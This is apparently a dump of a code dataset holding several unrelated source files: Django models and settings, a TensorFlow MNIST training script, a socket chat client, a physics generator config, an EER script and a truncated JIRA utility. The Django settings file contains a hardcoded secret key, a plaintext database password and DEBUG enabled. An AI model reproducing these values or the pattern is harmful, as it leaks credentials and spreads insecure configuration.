blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 2
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
69
| license_type
stringclasses 2
values | repo_name
stringlengths 5
118
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
63
| visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 2.91k
686M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 213
values | src_encoding
stringclasses 30
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 2
10.3M
| extension
stringclasses 246
values | content
stringlengths 2
10.3M
| authors
listlengths 1
1
| author_id
stringlengths 0
212
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
7782f238bbd0d8255c48030ab2509aadec6ec136
|
a349c67e63c1cf8203c938ea1b1c9fa4f10252fa
|
/admin_back/branch/models.py
|
1342bccaf0c08d8a0de51e95cc92a7af26576c21
|
[] |
no_license
|
shubham2704/TopaAcademy_
|
a068b45e62f857786c0aa43f6c47dfea4cdd85d0
|
859ed88489dbabebf0318a53eabe91eae80297ca
|
refs/heads/master
| 2023-01-11T22:58:33.052314
| 2019-11-10T11:52:22
| 2019-11-10T11:52:22
| 220,782,125
| 0
| 0
| null | 2022-12-10T08:26:33
| 2019-11-10T11:45:51
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 659
|
py
|
from django.db import models
# Create your models here.
class branch_degree(models.Model):
degree_name = models.CharField(max_length=75)
degree_status = models.CharField(max_length=25)
date = models.DateField(auto_now_add=True)
program = models.CharField(max_length=100, default="")
duration = models.CharField(max_length=100, default="")
semester = models.CharField(max_length=100, default="")
class branchs(models.Model):
degree_id = models.IntegerField()
degree_name = models.CharField(max_length=75, default="")
branch_name = models.CharField(max_length=100)
date = models.DateField(auto_now_add=True)
|
[
"rs188282@gmail.com"
] |
rs188282@gmail.com
|
5d4d8e29a7cab2dccae8f4943f14e51687f2fb77
|
f4420cffb38e07800d3c5bdab01aada857fa0e22
|
/class3/class3_train.py
|
14864daf688899fc6e804a526969296a78037299
|
[] |
no_license
|
JShangS/Class_NUDT
|
8198c0d255ad3a76c02e32156eeb82c1d565011f
|
ea057d1b570965a2c900096611e2473e94ddf3c0
|
refs/heads/master
| 2020-03-16T06:04:20.633033
| 2018-07-18T15:36:17
| 2018-07-18T15:36:17
| 132,546,623
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,836
|
py
|
# 该模型实现如下的功能,输入两个MINIST图片,判断是不是同一个数字。
# 输入 负样本对:X1=6的图片 , X2=9的图片 输出:1
# 输入 正样本对:X1=3的图片 , X2=3的图片 输出:0
import tensorflow as tf
import numpy as np
from tensorflow.examples.tutorials.mnist import input_data
##############平衡样本#############
def balanced_batch(batch_x, batch_y, num_cls):
batch_size = len(batch_y)
pos_per_cls_e = round(batch_size / 2 / num_cls)
index = batch_y.argsort()
ys_1 = batch_y[index]
#print(ys_1)
num_class = []
pos_samples = []
neg_samples = set()
cur_ind = 0
for item in set(ys_1):
num_class.append((ys_1 == item).sum())
num_pos = pos_per_cls_e
while (num_pos > num_class[-1]):
num_pos -= 2
pos_samples.extend(
np.random.choice(
index[cur_ind:cur_ind + num_class[-1]], num_pos,
replace=False).tolist())
neg_samples = neg_samples | (set(
index[cur_ind:cur_ind + num_class[-1]]) - set(list(pos_samples)))
cur_ind += num_class[-1]
neg_samples = list(neg_samples)
x1_index = pos_samples[::2]
x2_index = pos_samples[1:len(pos_samples) + 1:2]
x1_index.extend(neg_samples[::2])
x2_index.extend(neg_samples[1:len(neg_samples) + 1:2])
p_index = np.random.permutation(len(x1_index))
x1_index = np.array(x1_index)[p_index]
x2_index = np.array(x2_index)[p_index]
r_x1_batch = batch_x[x1_index]
r_x2_batch = batch_x[x2_index]
r_y_batch = np.array(
batch_y[x1_index] != batch_y[x2_index], dtype=np.float)
r_y_batch = np.expand_dims(r_y_batch, 0)
return r_x1_batch, r_x2_batch, r_y_batch
###########计算准确率################################
def calc_accuracy(pred, y):
accuracy = tf.equal(tf.to_float(pred > 2.5), y)
# accuracy = tf.equal(pred, y)
accuracy = tf.cast(accuracy, tf.float32)
accuracy = tf.reduce_mean(accuracy, name='Accuracy')
return sess.run(accuracy, feed_dict={x1: xs_t1, x2: xs_t2, y: y_ts})
##################添加网络的函数2个输入2输出###########################
def add_layer(inputs1,
inputs2,
in_size,
out_size,
Wname,
Bname,
activation_function=None):
Weights = tf.Variable(
tf.random_normal([in_size, out_size]),
name=Wname) #random_normal#zeros
biases = tf.Variable(tf.random_normal([1, out_size]), name=Bname)
Wx_plus_b1 = tf.matmul(inputs1, Weights) + biases
Wx_plus_b2 = tf.matmul(inputs2, Weights) + biases
if activation_function is None:
outputs1 = Wx_plus_b1
outputs2 = Wx_plus_b2
else:
outputs1 = activation_function(Wx_plus_b1)
outputs2 = activation_function(Wx_plus_b2)
return outputs1, outputs2
##########读取数据################################
old_v = tf.logging.get_verbosity()
tf.logging.set_verbosity(tf.logging.ERROR)
mnist = input_data.read_data_sets('./data/mnist', one_hot=False)
# train_data = mnist.train.images # Returns np.array
# train_labels = np.asarray(mnist.train.labels, dtype=np.float)
# test_data = mnist.test.images
# test_labels = np.asarray(mnist.train.labels, dtype=np.float)
#####################构图#####################
batch_size = 64
x1 = tf.placeholder(tf.float32, shape=[None, 784], name='input1')
x2 = tf.placeholder(tf.float32, shape=[None, 784], name='input2')
y = tf.placeholder(tf.float32, shape=[1, None], name='label')
###第一层###################
L11, L12 = add_layer(x1, x2, 784, 500, 'W1', 'B1',
tf.nn.leaky_relu) #tf.nn.sigmoid
###第二个层###################
L21, L22 = add_layer(
L11, L12, 500, 10, 'W2', 'B2',
tf.nn.leaky_relu) #tf.nn.softmax #tf.nn.relu#tf.nn.leaky_relu
###############计算Ew和预测##################
Ew = tf.sqrt(tf.reduce_sum(tf.square(tf.subtract(L21, L22)), 1), name='Ew')
pred = Ew #tf.nn.sigmoid(Ew)
# pred = tf.to_float(tf.equal(tf.argmax(L21, 1), tf.argmax(L22, 1)))
############loss#############
Q = tf.constant(5, dtype=tf.float32)
# loss = tf.reduce_mean(tf.square(y - pred))
loss = tf.add(
tf.multiply(
tf.multiply(tf.subtract(1.0, y), tf.div(2.0, Q)), tf.square(Ew)),
tf.multiply(
tf.multiply(tf.multiply(2.0, y), Q),
tf.exp(tf.multiply(tf.div(-2.77, Q), Ew))))
lr = 1e-2
optimizer = tf.train.AdamOptimizer(
learning_rate=lr) #AdamOptimizer#GradientDescentOptimizer
train = optimizer.minimize(loss=(loss)) #tf.reduce_mean
################会话############################
ACC = []
saver = tf.train.Saver()
with tf.Session() as sess:
iter = 20001
sess.run(tf.global_variables_initializer())
for itera in range(iter):
batch_x, batch_y = mnist.train.next_batch(batch_size * 2)
xs_1, xs_2, y_s = balanced_batch(batch_x, batch_y, num_cls=10)
_, l, y_pred, rEw = sess.run(
[train, loss, pred, Ew], feed_dict={
x1: xs_1,
x2: xs_2,
y: y_s
})
if itera % 1000 == 0:
print('\n')
print('第', itera, '次迭代,损失为: ', sess.run(tf.reduce_mean(l)))
print(y_s.reshape((1, -1)))
print('Ew', rEw, '\n')
#######################测试#############################
batch_x, batch_y = mnist.test.next_batch(batch_size * 2)
xs_t1, xs_t2, y_ts = balanced_batch(batch_x, batch_y, num_cls=10)
#######准确率########################
# ACC.append(calc_accuracy(pred, y))
ACC = calc_accuracy(pred, y)
print('准确率 ACC =', ACC)
saver.save(sess, './model_class3/my_test_model')
tf.logging.set_verbosity(old_v)
|
[
"424431687@qq.com"
] |
424431687@qq.com
|
9ac8b9102cb25d5b191859e8416350e58ed239ce
|
915b1364a4e6df3c5f2877b73204d91f1b60a7b6
|
/alfred/services/petition_statuses.py
|
ae8b13d757678328f096a3f60e8ae91d61271341
|
[] |
no_license
|
MariaHajj/alfred
|
5891bcb27b54eb865594d706973bbf3ed66a356e
|
fad3da69d45773818a36f73c9446fa81ff515199
|
refs/heads/master
| 2023-09-03T19:29:47.593299
| 2021-10-22T21:31:32
| 2021-10-22T21:31:32
| 336,099,114
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,344
|
py
|
from alfred.dao.petition_statuses import petition_status_dao,\
PetitionStatus, db
class PetitionStatusService():
__instance__ = None
def __init__(self):
if PetitionStatusService.__instance__ is None:
PetitionStatusService.__instance__ = self
else:
raise Exception("You cannot create another"
"PetitionStatusService class")
@staticmethod
def get_instance():
if not PetitionStatusService.__instance__:
PetitionStatusService()
return PetitionStatusService.__instance__
def create_petition_status(self, name, description):
if (name is None) or (description is None):
return None
petition_status = petition_status_dao.get_by_name(name=name)
if petition_status is None:
petition_status = PetitionStatus(name=name,
description=description)
petition_status_dao.add(petition_status)
return petition_status
return None
def update_petition_status(self, petition_status_id,
name=None, description=None):
if (petition_status_id is None):
return False
if (name is None) and (description is None):
return False
try:
petition_status = petition_status_dao\
.get_by_id(petition_status_id=petition_status_id)
if name:
petition_status.name = name
if description:
petition_status.description = description
db.session.commit()
return True
except Exception:
return False
def delete_petition_status(self, petition_status_id):
if petition_status_id is None:
return False
try:
petition_status = petition_status_dao\
.get_by_id(petition_status_id=int(petition_status_id))
if petition_status:
petition_status_dao\
.delete_petition_status_by_id(petition_status_id)
return True
else:
return False
except Exception:
return False
petition_status_service = PetitionStatusService.get_instance()
|
[
"mariahajj5@gmail.com"
] |
mariahajj5@gmail.com
|
a4a54fab9bf8da2d7cc0958d3f1e07bf28e76a48
|
92c66c64b70bc41e60252b48dafd58b2c0d1a39f
|
/Python/Testing/KNNImpute.py
|
2c3e15d3a40a3af6228c4a0188e314e6248e6569
|
[] |
no_license
|
matt-ramcharan/unknownPrimary
|
360bebc847a3cfa6312970c5cc74256240afc39a
|
d83f45c8e08ae2857b057070e665a6dfb7ad35e1
|
refs/heads/master
| 2021-06-22T07:40:15.887110
| 2021-02-24T21:25:49
| 2021-02-24T21:25:49
| 194,879,144
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 687
|
py
|
import pandas as pd
ds = pd.read_csv('/home/matt/Documents/TechnicalProject/unknownPrimary/Python/DataFormatting/FullDataColoRectal93.csv')
Y = ds['Label']
from sklearn.preprocessing import LabelEncoder
labelencoder_y = LabelEncoder()
Y = labelencoder_y.fit_transform(Y)
# print(Y)
X = pd.array(ds.drop('Label', axis=1), dtype='Int64')
from numpy import NaN
mask = X==0
# X=X.astype(pd.Int64Dtype())
X[mask] = NaN
from fancyimpute import KNN
# X is the complete data matrix
# X_incomplete has the same values as X except a subset have been replace with NaN
# Use 3 nearest rows which have a feature to fill in each row's missing features
X_filled_knn = KNN(k=3).fit_transform(X.T)
pass
|
[
"matthew.a.ramcharan@gmail.com"
] |
matthew.a.ramcharan@gmail.com
|
ef9c532d9518673c77b85d20f3fe332064e3096a
|
b6699361cea596afbafcff40056e12a3ccadb590
|
/nebula_utils/nebula_utils/persist_compute/utils.py
|
2f9feffcaa4a8285a2abe800ba2837e256eb6e2b
|
[
"Apache-2.0"
] |
permissive
|
benhe119/python_lib
|
4c6ba3468ef380eadc5ab65401052aba224801db
|
e2d4052de04c82cb7bccd08042f28db824cab442
|
refs/heads/master
| 2020-08-09T10:09:59.368521
| 2019-03-29T02:21:55
| 2019-03-29T02:21:55
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,722
|
py
|
# -*- coding: utf-8 -*-
Group_Key_To_Dimension = dict(
c_ip = 'ip',
uid = 'user',
page = 'page',
did = 'did',
# c_ipc = 'ipc',
)
Avail_Dimensions = tuple(Group_Key_To_Dimension.values())
# dimension : variable_name(获取点击量的变量名)
Click_Variable_Names = dict(
ip='ip__visit__dynamic_count__1h__slot',
did='did__visit__dynamic_count__1h__slot',
user='user__visit__dynamic_count__1h__slot',
page='page__visit__dynamic_count__1h__slot'
)
IP_Stat_Type = 2
IPC_Stat_Type = 3
DID_Stat_Type = 4
UID_Stat_Type = 5
PAGE_Stat_Type = 6
Dimension_Stat_Prefix = dict(
ip = IP_Stat_Type,
ipc = IPC_Stat_Type,
did = DID_Stat_Type,
user = UID_Stat_Type,
page = PAGE_Stat_Type,
)
Category = ['VISITOR', 'ACCOUNT', 'ORDER',
'TRANSACTION', 'MARKETING', 'OTHER']
Scene_Variable_Names = dict(
VISITOR='total__visit__visitor_incident_count__1h__slot',
ACCOUNT='total__visit__account_incident_count__1h__slot',
ORDER='total__visit__order_incident_count__1h__slot',
TRANSACTION='total__visit__transaction_incident_count__1h__slot',
MARKETING='total__visit__marketing_incident_count__1h__slot',
OTHER='total__visit__other_incident_count__1h__slot'
)
def get_dimension(group_key_name):
"""
根据groupby的key获取对应统计Stat_Dict中维度的key值
"""
return Group_Key_To_Dimension.get(group_key_name, None)
def dict_merge(src_dict, dst_dict):
"""
将两个dict中的数据对应键累加,
不同类型值的情况:
>>> s = dict(a=1,b='2')
>>> d = {'b': 3, 'c': 4}
>>> dict_merge(s,d)
>>> t = {'a': 1, 'b': 5, 'c': 4}
>>> s == t
True
>>> s = dict(a=set([1,2]), )
>>> d = dict(a=set([2, 3]),)
>>> dict_merge(s,d)
>>> t = {'a':set([1,2,3])}
>>> s == t
True
>>> s = dict(a={'a':1, 'b':2})
>>> d = dict(a={'a':1, 'b':2})
>>> dict_merge(s, d)
>>> t = dict(a={'a':2, 'b':4})
>>> s == t
True
"""
for k,v in dst_dict.iteritems():
if not src_dict.has_key(k):
src_dict[k] = v
else:
if isinstance(v, (basestring, int, float)):
src_dict[k] = int(v) + int(src_dict[k])
elif isinstance(v, set):
assert type(v) == type(src_dict[k]), 'key %s,dst_dict value: %s type: %s, src_dict value: %s type:%s' % (k, v, type(v), src_dict[k], type(src_dict[k]))
src_dict[k].update(v)
elif isinstance(v, dict):
assert type(v) == type(src_dict[k]), 'key %s,dst_dict value: %s type: %s, src_dict value: %s type:%s' % (k, v, type(v), src_dict[k], type(src_dict[k]))
dict_merge(src_dict[k], v)
|
[
"zengjinping@threathunter.cn"
] |
zengjinping@threathunter.cn
|
d268885b06e5ecfc77a921f7ad6c72e5960b568d
|
7465b8a0e9230c0fbfaa6fca61cd37a8f9808867
|
/python/file_read.py
|
407ad5fef985af2b41efa8472fa7a9c0a23340be
|
[] |
no_license
|
leventarican/cookbook
|
64ac76f64ae2277e4a35ed9e0ec39d57296ec84c
|
44ae9ffe8ec50dc0a65d8c23a7971d93b7240886
|
refs/heads/master
| 2023-07-21T15:24:30.156023
| 2023-03-24T23:26:50
| 2023-03-24T23:26:50
| 188,314,816
| 1
| 1
| null | 2023-07-07T21:43:58
| 2019-05-23T22:26:39
|
Java
|
UTF-8
|
Python
| false
| false
| 165
|
py
|
import os
file = 'tmp.file'
file_check = os.path.isfile(file)
print(f'is file: {file_check}')
if file_check:
text = open(file).read().rstrip()
print(text)
|
[
"levent@protonmail.com"
] |
levent@protonmail.com
|
d1a6d8596ce7eb63d9e60c8828b8e99dc7f0505f
|
1431d485f0d2d26fd1205de928410e2fd0177999
|
/egift/settings.py
|
fa0f0f07e155ba654eb85ad69aac32f19be4adf7
|
[] |
no_license
|
ryanagao/egift
|
38feff9f3e30505724d95945ce78d24db1f030e3
|
bcd92afe5079f2631ac12f058e9c865d27f05345
|
refs/heads/master
| 2022-10-28T11:46:50.641772
| 2020-06-09T09:03:51
| 2020-06-09T09:03:51
| 268,835,146
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,429
|
py
|
"""
Django settings for egift project.
Generated by 'django-admin startproject' using Django 2.1.15.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '9)-mb9o&mb3hte+9l*qiftoa=-n)c*sudx7d_(ut+*yt-koxx^'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['192.168.1.50']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
# 'users',
# 'profiles',
# 'merchants',
'egiftadmin',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'egift.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'egift.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'egift',
'USER': 'ryanagao',
'PASSWORD': 'ryan1996',
'HOST': 'localhost',
'PORT': '3306',
}
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
LOGIN_URL = '/login'
STATIC_URL = '/static/'
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'egiftadmin/media')
AUTH_USER_MODEL = 'egiftadmin.User'
AUTH_PROFILE_MODULE = 'eegiftadmin.User'
|
[
"ryanagao@yahoo.com"
] |
ryanagao@yahoo.com
|
a0cf638570fd5e5ca668f87fea26dba6aa801a6c
|
f59d214b39cde79ae1785dd85c2302e61f88a6a9
|
/mailer/migrations/0001_initial.py
|
698297748dbee433427c3f4d76abbf71fdbf7c3e
|
[
"MIT"
] |
permissive
|
Fyodor-Mityanin/mailgunner
|
24c9502c1fd3b770f67f9e84a4590849a1dba94d
|
4292819383ee2d8a90ef1b02d5f2053c1b889f42
|
refs/heads/main
| 2023-07-15T02:39:55.061345
| 2021-08-16T16:38:18
| 2021-08-16T16:38:18
| 395,543,991
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,774
|
py
|
# Generated by Django 3.2.6 on 2021-08-13 11:49
import django.db.models.deletion
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Email',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('email', models.EmailField(max_length=254, unique=True, verbose_name='Почта')),
('name', models.CharField(max_length=20, verbose_name='Имя адресата')),
('surname', models.CharField(max_length=20, verbose_name='Фамилия адресата')),
('birth_date', models.DateTimeField(blank=True, verbose_name='День рождения адресата')),
],
options={
'verbose_name': 'Почта',
},
),
migrations.CreateModel(
name='Sent_mail',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('send_date', models.DateTimeField(auto_now_add=True, verbose_name='Время отправки')),
('is_read', models.CharField(max_length=20, verbose_name='Имя адресата')),
('email', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='sends', to='mailer.email', verbose_name='Почта')),
],
options={
'verbose_name': 'Отправленное письмо',
'verbose_name_plural': 'Отправленные письма',
},
),
]
|
[
"79231292918@ya.ru"
] |
79231292918@ya.ru
|
07058386513c7f2b9211d4ef939667c38b5caa96
|
22f52f8935932d7702ab8c69c206e50e658a4229
|
/client.py
|
c2bc6a02d6d934d18afddb117bce75c948bae00f
|
[] |
no_license
|
thomaskaridis91/TCP-chat-room-Python
|
066f12f41db6d8a023c238f0ea0df351b880a4e0
|
4a2b1a7bef57252ed4ba28daeeec09ddf97a3727
|
refs/heads/main
| 2023-02-03T01:29:04.967565
| 2020-12-15T16:25:32
| 2020-12-15T16:25:32
| 321,042,702
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,462
|
py
|
import socket
import threading
nickname = input("Choose a nickname: ")
if nickname == 'admin':
password = input("Enter password for admin: ")
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #socket initialization
client.connect(('127.0.0.1', 7976)) #connecting client to server
stop_thread = False
def receive(): #making valid connection
while True:
global stop_thread
if stop_thread:
break
try:
message = client.recv(1024).decode('ascii')
if message == 'NICK':
client.send(nickname.encode('ascii'))
next_message = client.recv(1024).decode('ascii')
if next_message == 'password':
client.send(password.encode('ascii'))
if client.recv(1024).decode('ascii') == 'Refuse access':
print("Connection was denied")
stop_thread = True
elif next_message == 'Ban':
print('Connection refused because user is banned')
client.close()
stop_thread = True
else:
print(message)
except: #case on wrong ip/port details
print("An error occurred!")
client.close()
break
def write():
while True:
if stop_thread:
break ##checking messages if client is banned or kicked
message = '{}: {}'.format(nickname, input(''))
if message[len(nickname)+2:].startswith('/'):
if nickname == 'admin':
if message[len(nickname)+2].startswith('/kick'):
client.send(f'Kick {message[len(nickname)+2+6:]}'.encode('ascii'))
elif message[len(nickname)+2].startswith('/ban'):
client.send(f'Ban {message[len(nickname)+2+5:]}'.encode('ascii'))
else:
print("Can't perform action -- no admin privileges")
else:
client.send(message.encode('ascii')) #message layout
receive_thread = threading.Thread(target=receive) #receiving multiple messages
receive_thread.start()
write_thread = threading.Thread(target=write) #sending messages
write_thread.start()
|
[
"noreply@github.com"
] |
thomaskaridis91.noreply@github.com
|
598e560d763656adbc9a89350e1a41a550753672
|
0fccee4c738449f5e0a8f52ea5acabf51db0e910
|
/genfragments/EightTeV/ADD/ADDMonoJet_Pythia8_8TeV_d2_MD4_Tune4C_cfi.py
|
b5abcb126193f8ade437774aa00cf6cd962f7ded
|
[] |
no_license
|
cms-sw/genproductions
|
f308ffaf3586c19b29853db40e6d662e937940ff
|
dd3d3a3826343d4f75ec36b4662b6e9ff1f270f4
|
refs/heads/master
| 2023-08-30T17:26:02.581596
| 2023-08-29T14:53:43
| 2023-08-29T14:53:43
| 11,424,867
| 69
| 987
| null | 2023-09-14T12:41:28
| 2013-07-15T14:18:33
|
Python
|
UTF-8
|
Python
| false
| false
| 1,055
|
py
|
import FWCore.ParameterSet.Config as cms
generator = cms.EDFilter("Pythia8GeneratorFilter",
pythiaPylistVerbosity = cms.untracked.int32(1),
filterEfficiency = cms.untracked.double(1.0),
pythiaHepMCVerbosity = cms.untracked.bool(False),
comEnergy = cms.double(8000.0),
maxEventsToPrint = cms.untracked.int32(0),
PythiaParameters = cms.PSet(
pythia8_unparticle = cms.vstring(
'Tune:pp = 5',
'PDF:pSet = 5',
'ExtraDimensionsLED:monojet = on',
'ExtraDimensionsLED:CutOffmode = 1',
'ExtraDimensionsLED:t = 0.5',
'ExtraDimensionsLED:n = 2',
'ExtraDimensionsLED:MD = 4000.',
'5000039:m0 = 1200.',
'5000039:mWidth = 1000.',
'5000039:mMin = 1.',
'5000039:mMax = 13990.',
'PhaseSpace:pTHatMin = 80.',
'PartonLevel:MI = on',
'PartonLevel:ISR = on',
'PartonLevel:FSR = on',
'ParticleDecays:limitTau0 = on',
'ParticleDecays:tauMax = 10'
),
parameterSets = cms.vstring('pythia8_unparticle')
)
)
|
[
"sha1-481a5a2ac9973b7cab990140e7a395466f50a31e@cern.ch"
] |
sha1-481a5a2ac9973b7cab990140e7a395466f50a31e@cern.ch
|
232fc7c6fe140c92490d86fdcbc5cc5b0dd995d0
|
be7c4427047adcde81d76382b21bb6e1df8b6994
|
/data_processing/compute_EER.py
|
5ea742c5ac92c02e39bc9665e2dd31cd1109c4d8
|
[
"MIT"
] |
permissive
|
twistedmove/multistream-CNN
|
3d1d1be983b940f8a843349774866f0ecbc11a0c
|
a21bfe9f41d586d7e51f1ce345f11ecfb8df66e7
|
refs/heads/main
| 2023-02-13T14:21:39.601812
| 2021-01-05T15:29:06
| 2021-01-05T15:29:06
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,030
|
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# USAGE: python compute_EER.py --ground_truth data/trials.txt --prediction data/scores.txt
import os
import numpy
import argparse
import pdb
from scipy.optimize import brentq
from sklearn.metrics import roc_curve
from scipy.interpolate import interp1d
# ==================== === ====================
def GetArgs():
parser = argparse.ArgumentParser(description="VoxSRC")
parser.add_argument('--ground_truth', type=str, default='veriset/trials.txt',
help="Input trials file, with columns of the form <t0/1> <utt1> <utt2>")
parser.add_argument('--prediction', type=str, default='veriset/normalized-scores/stream1.txt',
help="Input scores file, with columns of the form <score> <utt1> <utt2>")
parser.add_argument('--positive', type=int, default=1, help='1 if higher is positive; 0 is lower is positive')
# opt = parser.parse_args()
args = parser.parse_args()
return args
# ==================== === ====================
def calculate_eer(y, y_score, pos):
# y denotes groundtruth scores,
# y_score denotes the prediction scores.
fpr, tpr, thresholds = roc_curve(y, y_score, pos_label=pos)
eer = brentq(lambda x: 1. - x - interp1d(fpr, tpr)(x), 0., 1.)
thresh = interp1d(fpr, thresholds)(eer)
return eer, thresh
# ==================== === ====================
def read_score(filename):
scores_file = open(filename, 'r').readlines()
scores = []
# you may also want to remove whitespace characters like `\n` at the end of each line
for line in scores_file:
score, utt1, utt2 = line.rstrip().split()
scores.append(float(score))
return scores
# ==================== === ====================
def main():
args = GetArgs()
y = read_score(args.ground_truth)
y_score = read_score(args.prediction)
eer, thresh = calculate_eer(y, y_score, args.positive)
print('EER : %.3f%%' % (eer * 100))
if __name__ == "__main__":
main()
|
[
"chenshenpe@163.com"
] |
chenshenpe@163.com
|
9110b94cd649c0cd67ec03c1e03f62dd6a7243d9
|
e37fd2fd6a09a9b28c18df6df9d7892357f0762c
|
/routines/randMat.py
|
741e62c15b93bf610a752e24120413296a816e3a
|
[] |
no_license
|
kjerfire/math5610
|
0238f566723d96df5ca7de1393a27d9c6a50efba
|
37a0693c957c3ce9bfa169c4ca5955bdcd72f4ac
|
refs/heads/master
| 2020-04-15T07:00:37.756127
| 2019-05-01T22:49:35
| 2019-05-01T22:49:35
| 164,483,734
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 117
|
py
|
import random
def randMat(m, n):
return [[random.random() for i in range(n)] for j in range(m)]
|
[
"noreply@github.com"
] |
kjerfire.noreply@github.com
|
4c9b0e631e8b0ca21e84f2aacadd30b83f22bd34
|
0549e79fc24ff13b06a353fade3c30e663e2e294
|
/dev/gobblin-jira-version
|
5796c543733ffcdf9ccb254819f4ba7889579f2f
|
[
"Apache-2.0",
"BSD-3-Clause",
"MIT",
"xpp"
] |
permissive
|
thaiphamquoc/incubator-gobblin
|
2b7f59b92b057f8ffc15eebb7908ff4125075094
|
8879cdec2680e9e748d7e89f5cef5d72110c1c07
|
refs/heads/master
| 2021-09-06T05:11:29.568067
| 2018-02-02T15:54:44
| 2018-02-02T15:54:44
| 119,752,509
| 1
| 0
| null | 2018-01-31T22:37:22
| 2018-01-31T22:37:22
| null |
UTF-8
|
Python
| false
| false
| 5,524
|
#!/usr/bin/env python
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Utility for updating fix version for Jiras.
#
# usage: ./gobblin-jira-version (see config env vars below)
#
from __future__ import print_function
import json
import os
import re
import subprocess
import sys
import textwrap
# Python 3 compatibility
try:
import urllib2 as urllib
except ImportError:
import urllib.request as urllib
if sys.version_info[0] == 3:
raw_input = input
try:
import click
except ImportError:
print("Could not find the click library. Run 'sudo pip install click' to install.")
sys.exit(-1)
try:
import keyring
except ImportError:
print("Could not find the keyring library. Run 'sudo pip install keyring' to install.")
sys.exit(-1)
JIRA_BASE = "https://issues.apache.org/jira/browse"
JIRA_API_BASE = "https://issues.apache.org/jira"
TMP_CREDENTIALS = {}
def register(username, password):
""" Use this function to register a JIRA account in your OS' keyring """
keyring.set_password('gobblin-pr', username, password)
def validate_jira_id(jira_id):
if not jira_id:
return
elif isinstance(jira_id, int):
return 'GOBBLIN-{}'.format(abs(jira_id))
# first look for GOBBLIN-X
ids = re.findall("GOBBLIN-[0-9]{1,6}", jira_id)
if len(ids) > 1:
raise click.UsageError('Found multiple issue ids: {}'.format(ids))
